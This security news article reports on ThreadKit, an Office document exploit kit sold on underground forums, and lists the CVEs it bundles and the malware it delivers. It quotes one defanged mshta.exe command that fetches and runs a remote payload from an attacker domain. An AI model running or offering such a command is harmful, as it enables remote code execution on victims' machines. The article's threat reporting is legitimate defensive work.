Tuesday, October 8, 2024
HomeCVE/vulnerabilityHackers Distributing Variety of New Exploits and Malware via Microsoft Office Document...

Hackers Distributing Variety of New Exploits and Malware via Microsoft Office Document Exploit Kit

Published on

Newly discovered Microsoft office document exploit kit contains a variety of recent exploits and Malware such as Lokibot, Formbook and tracking kit called such as ThreadKit targeting various organization and individuals around the world.

These Exploits kits are available in restricted underground crime forums and the cybercriminals are selling them at a different price.

They are used to spread a variety of malware payloads such as Trickbot and Chthonic, and RATs such as FormBook and Loki Bot and it also used for more sophisticated cyber attacks.

- Advertisement - EHA

Also Read: Hackers Illegally Purchasing Abused Code-signing & SSL Certificates From Underground Market

Exploit Kit Activities in June 2017

Initially, ThreadKit starts its activities around mid of 2017 with many of powerful exploits such as EXE and DOC files inside of the VBS Script.

It contains an exploited CVE-2017-0199 and download and execute the payload from its command and control server and install the embedded Smoke Loader and Trick banking malware.

Downloaded Decoy document

Exploit Kit Activities in October 2017

During October 2017, ThreadKit Started advertising in the underground forum including with another Exploit CVE 2017-8759.

Later it communicates with C2 server to execute the embedded executable and additionally it integrating the new vulnerabilities.

Also, it using various technique to avoid detection and employee the advance method to avoid detection by modifying the registry key.

The registry value “z|#” contains the path to the parent malicious document

Exploit kit Activities November 2017

Since Nov 2017 ThreadKit starts its aggressive activities and employee with brand new Microsoft Office vulnerabilities.

It Advertised the inclusion of exploits targeting CVE 2017-11882 running un the following command: “mshta.exe hxxps://seliodrones[.]info/vmware/w&\x12\x0cC”

Exploit kit Activity in February/March 2018

Very recent activities of this Exploit kit in Feb/March contains a very new serious exploit such as Adobe Flash zero-day (CVE-2018-4878) and several new Microsoft Office vulnerabilities.

According to Proofpoint,  A new forum post in February 2018 announced that exploits for the recently disclosed CVE-2018-0802, as well as a July 2017 Office vulnerability (CVE-2017-8570), had been added to ThreadKit.

Main Distributing of the large spike of email campaigns with ThreadKit generated MS Office attachments that included these exploits.

“ThreadKit is a relatively new and popular document exploit builder kit that has been used in the wild since at least June 2017, by a variety of actors carrying out both targeted and broad-based crimeware campaigns. This new document exploit builder kit makes the use of the latest Microsoft Office exploits accessible to even low-skilled malicious actors. Proofpoint said.”

Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Latest articles

Badge and CyberArk Announce Partnership to Redefine Privacy in PAM and Secrets Management

Partnership aims to help businesses eliminate vulnerable attack surfaces and provide a more streamlined...

LemonDuck Malware Exploiting SMB Vulnerabilities To Attack Windwos Servers

The attackers exploited the EternalBlue vulnerability to gain initial access to the observatory farm,...

Critical Automative 0-Day Flaws Let Attackers Gain Full Control Over Cars

Recent discoveries in the automotive cybersecurity landscape have unveiled a series of critical zero-day...

Likho Hackers Using MeshCentral For Remotely Managing Victim Systems

The Awaken Likho APT group launched a new campaign in June of 2024 with...

Free Webinar

Protect Websites & APIs from Malware Attack

Malware targeting customer-facing websites and API applications poses significant risks, including compliance violations, defacements, and even blacklisting.

Join us for an insightful webinar featuring Vivek Gopalan, VP of Products at Indusface, as he shares effective strategies for safeguarding websites and APIs against malware.

Discussion points

Scan DOM, internal links, and JavaScript libraries for hidden malware.
Detect website defacements in real time.
Protect your brand by monitoring for potential blacklisting.
Prevent malware from infiltrating your server and cloud infrastructure.

More like this

LemonDuck Malware Exploiting SMB Vulnerabilities To Attack Windwos Servers

The attackers exploited the EternalBlue vulnerability to gain initial access to the observatory farm,...

Open-Source Scanner Released to Detect CUPS Vulnerability

A new open-source scanner has been released to detect a critical vulnerability in the...

RCE Vulnerability (CVE-2024-30052) Allow Attackers To Exploit Visual Studio via Dump Files

The researcher investigated the potential security risks associated with debugging dump files in Visual...